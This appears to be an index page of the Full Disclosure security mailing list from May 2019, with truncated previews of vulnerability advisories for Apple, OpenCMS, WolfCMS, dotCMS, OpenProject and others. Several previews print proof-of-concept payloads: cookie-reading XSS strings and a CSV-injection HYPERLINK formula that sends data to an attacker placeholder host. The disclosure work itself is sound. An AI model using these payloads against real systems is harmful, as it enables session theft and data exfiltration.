Full Disclosure

A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. More importantly, fresh vulnerabilities sometimes hit this list many hours or days before they pass through the Bugtraq moderation queue.

APPLE-SA-2019-5-13-2 macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra

13 May, 2019 - 13:19

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-2 macOS Mojave 10.14.5, Security Update
2019-003 High Sierra, Security Update 2019-003 Sierra

macOS Mojave 10.14.5, Security Update 2019-003 High Sierra,
Security Update 2019-003 Sierra are now available and
address the following:

Accessibility Framework
Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.4
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with...

APPLE-SA-2019-5-13-1 iOS 12.3

13 May, 2019 - 13:19

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-1 iOS 12.3

iOS 12.3 is now available and addresses the following:

AppleFileConduit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)

Contacts
Available for: iPhone 5s and later, iPad...

[CVE-2019-8978] Improper Authentication (CWE-287) in Ellucian Banner Web Tailor and Banner Enterprise Identity Services

13 May, 2019 - 13:18

Posted by Joshua Mulliken on May 13

===================
Title: [CVE-2019-8978] Improper Authentication (CWE-287) in Ellucian Banner Web Tailor and Banner Enterprise Identity
Services
Author: Joshua Mulliken <joshua () mulliken net>

Thanks to: Carnegie Mellon University CERT Coordination Center
Date Found: Dec. 17, 2018
Vendor: Ellucian Company L.P.
Vendor Homepage: https://www.ellucian.com
Products: Banner Web Tailor and Banner Enterprise Identity Services
Web Tailor Affected...

TOR browser / Firefox telemetry data

13 May, 2019 - 13:16

Posted by Bipin Gautam on May 13

POC:

tl;dr

run just Firefox browser / TOR and just nothing

and tcpdump the computing device / network

firewall BLOCK all IP/A names, gradually... that shows up in tcpdump
when you are not using firefox but it connects automatically (if you
block something firefox hops to something else, 3-5+ times)

QUICK FIX:

in address bar:

about:config

search for string:

org

com

mozilla

firefox

google

...?

to start with : almost all... the url...

SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)

13 May, 2019 - 08:27

Posted by SEC Consult Vulnerability Lab on May 13

Then the message was tampered by changing the value of the "Hash" Armor Header
from SHA-1 to SHA-512:

(content of hash_spoof.asc file):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Message to be signed
-----BEGIN PGP SIGNATURE-----
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N...

Cross Site Scripting | WolfCMS v0.8.3.1 and before

10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: WolfCMS v0.8.3.1 and before is vulnerable to cross site
scripting in User Add module for parameter Name.

Impacted URL is http://[your_webserver_ip]/wolfcms/?/admin/user/add

Payload used is "TestXSS><img src=x onmousover=alert(document.cookie)>

Further details: https://github.com/wolfcms/wolfcms/issues/683

Already requested for CVE, yet to receive it.

CSV Injection | Alkacon OpenCMS v10.5.4 and before

10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New
User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe")'

Further details are available here
https://github.com/alkacon/opencms-core/issues/636

Already requested for...

Cross Site Scripting | Alkacon OpenCMS v10.5.4 and before

10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to cross site
scripting in New User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used in PoC is "TestXSS<img+src=x+onmouseover=alert(document.domain)

Further details are available here
https://github.com/alkacon/opencms-core/issues/635

Already requested for CVE, yet to receive...

Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability

10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Read full vulnerability report @
https://secureli.com/dotcms-v5-1-1-open-redirect-vulnerability/

dotCMS v5.1.1 suffers from an Open Redirect Vulnerability, in addition
to many other vulnerabilities that I am still verifying.

The following URL is a proof-of-concept that requires a user to be
logged in. Simply login to the demo before visiting the supplied POC.

Logging into the demo requires you to go to
https://demo.dotcms.com/dotAdmin <...

dotCMS v5.1.1 HTML Injection & XSS Vulnerability

10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Read full vulnerability report @
https://secureli.com/dotcms-v5-1-1-html-injection-xss-vulnerability/

dotCMS v5.1.1 suffers from an HTML injection and XSS vulnerability, in
addition to many other vulnerabilities that I am still verifying.

There's a screenshot available on my blog link above.

To reproduce this vulnerability, simply go to
https://dotcms.com/dotAdmin/ and login with their demo credentials
(username: admin () dotcms com...

dotCMS v5.1.1 Vulnerabilities

10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Hello,

I identified several vulnerabilities in dotCMS v5.1.1 due to vulnerable
open source dependencies.

Full security write up:
http://secureli.com/dotcms-v5-1-1-vulnerable-open-source-dependencies/

The details:

/ROOT/html/js/scriptaculous/prototype.js

↳ prototypejs 1.5.0
prototypejs 1.5.0 has known vulnerabilities: severity: high; CVE:
CVE-2008-7220; http://www.cvedetails.com/cve/CVE-2008-7220/...

Enghouse Interactive´s CCSP 7.2.5 API XXE and SSRF vulnerability via unauthenticated GET Request

10 May, 2019 - 12:14

Posted by David H on May 10

<!--
# Exploit Title: Enghouse Interactive´s CCSP 7.2.5 API XXE and SSRF
vulnerability via unauthenticated GET Request
# Date: 05-08-2018
# Exploit Author: David Herrero
# Vendor Homepage: https://www.enghouseinteractive.com
# Software Link:
https://www.enghouseinteractive.com/products/contact-center/contact-center-for-service/
# Version: Enghouse Interactive´s CCSP 7.2.5.102
# Tested on: Windows
# CVE : CVE-2018-8940
# Category:...

WordPress Plugin Form Maker 1.13.3 - SQL Injection

10 May, 2019 - 12:13

Posted by Daniele Scanu on May 10

# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection
# Date: 22-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://10web.io/plugins/
# Software Link: https://wordpress.org/plugins/form-maker/
# Version: 1.13.3
# Tested on: Wordpress 5.1

Description:
In the Form Maker plugin before 1.13.3 for WordPress, it's possible to
achieve SQL injection in the function get_labels_parameters in the file...

SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject

10 May, 2019 - 02:23

Posted by SEC Consult Vulnerability Lab on May 10

SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
=======================================================================
title: Unauthenticated SQL Injection vulnerability
product: OpenProject
vulnerable version: 5.0.0 - 8.3.1
fixed version: 8.3.2 & 9.0.0
CVE number: CVE-2019-11600
impact: Critical
homepage: https://www.openproject.org
found:...

SEC Consult SA-20190509-0 :: Multiple Vulnerabilities in Gemalto (Thales Group) DS3 Authentication Server / Ezio Server

9 May, 2019 - 05:55

Posted by SEC Consult Vulnerability Lab on May 09

SEC Consult Vulnerability Lab Security Advisory < 20190509-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Gemalto (Thales Group) DS3 Authentication Server / Ezio
Server
vulnerable version: Ezio DS3 server <v3.1.0
fixed version: Ezio DS3 server v3.1.0
CVE number: CVE-2019-9156, CVE-2019-9157, CVE-2019-9158...

Open source tool | Lets Map Your Network

7 May, 2019 - 12:31

Posted by Pramod Rana on May 07

Let’s Map Your Network (LMYN) aims to provide an easy to use interface
to security engineers and network administrators to have their network
in graphical form with zero manual error, where a node represents a
system and a relationship between nodes represents the connection.

It is of utmost importance for any security engineer to understand their
network first before securing it and it becomes a daunting task to
have a ‘true’ understanding of a...

RCE in CGI Servlet – Apache Tomcat on Windows – CVE-2019-0232

4 May, 2019 - 14:22

Posted by Nightwatch Cybersecurity Research on May 04

[Original post:
https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/]

SUMMARY

Apache Tomcat has a vulnerability in the CGI Servlet which can be
exploited to achieve remote code execution (RCE). This is only
exploitable when running on Windows in a non-default configuration in
conjunction with batch files. The vendor released a fix in Tomcat
versions 7.0.94, 8.5.40...

[SYSS-2019-005]: ABUS Secvest - Proximity Key - Cryptographic Issues (CWE-310)

4 May, 2019 - 12:37

Posted by Matthias Deeg on May 04

Advisory ID: SYSS-2019-005
Product: ABUS Secvest (FUAA50000)
Manufacturer: ABUS
Affected Version(s): v3.01.01
Tested Version(s): v3.01.01
Vulnerability Type: Cryptographic Issues (CWE-310)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-03-15
Solution Date: -
Public Disclosure: 2019-05-02
CVE Reference: CVE-2019-9861
Authors of Advisory: Matthias Deeg, Gerhard Klostermeier (SySS GmbH)...

OneShield - Policy Solutions - Dragon Framework Persistent XSS in Framework Textboxes

4 May, 2019 - 12:33

Posted by ghost on May 04

# Exploit Title: Dragon - Persistent XSS in Framework Textboxes
# Date: 12/28/2018
# Vendor Homepage: https://oneshield.com
# Software Link: https://oneshield.com/business-solutions/oneshield-pc-solutions/oneshield-policy/
# Version: 5.0, 5.1
# Tested on: 5.1
# Exploit Author: Josh Sheppard
# Exploit Contact: ghost () a t undervurse dot_com
# Exploit Technique: Remote
# CVE: CVE-2019-11643
1. Description
A persistent cross site scripting...

OneShield - Policy Solutions - Dragon Framework Log Poisoning

4 May, 2019 - 12:33

Posted by ghost on May 04

# Exploit Title: Dragon - Log Poisoning
# Date: 12/28/2018
# Vendor Homepage: https://oneshield.com
# Software Link: https://oneshield.com/business-solutions/oneshield-pc-solutions/oneshield-policy/
# Version: 5.0, 5.1
# Tested on: 5.1
# Exploit Author: Josh Sheppard
# Exploit Contact: ghost () a t undervurse dot_com
# Exploit Technique: Remote
# CVE ID: CVE-2019-11642
1. Description
A log poisoning vulnerability has been discovered in the...